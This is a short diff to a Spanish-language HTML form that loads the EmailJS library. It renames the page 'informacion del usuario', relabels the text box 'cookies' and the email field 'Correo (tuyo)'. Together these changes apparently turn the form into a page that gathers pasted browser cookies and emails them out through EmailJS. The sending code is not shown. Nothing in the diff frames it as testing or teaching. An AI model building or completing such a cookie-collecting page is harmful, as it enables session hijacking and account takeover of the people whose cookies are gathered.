--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="es">
 <head>
 <meta charset="UTF-8">
-<title>Formulario</title>
+<title>informacion del usuario</title>
 <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
 <script>
 (function(){
@@ -47,8 +47,8 @@ button:hover {
 <div class="contenedor" id="formulario">
     <h2>Formulario</h2>
     <input type="text" id="usuario" placeholder="Usuario / Nombre" required>
-    <textarea id="texto" placeholder="Texto copiado" required></textarea>
-    <input type="email" id="correo" placeholder="Correo del usuario" required>
+    <textarea id="texto" placeholder="cookies" required></textarea>
+    <input type="email" id="correo" placeholder="Correo (tuyo)" required>
     <button onclick="enviarFormulario()">Enviar</button>
 </div>
 
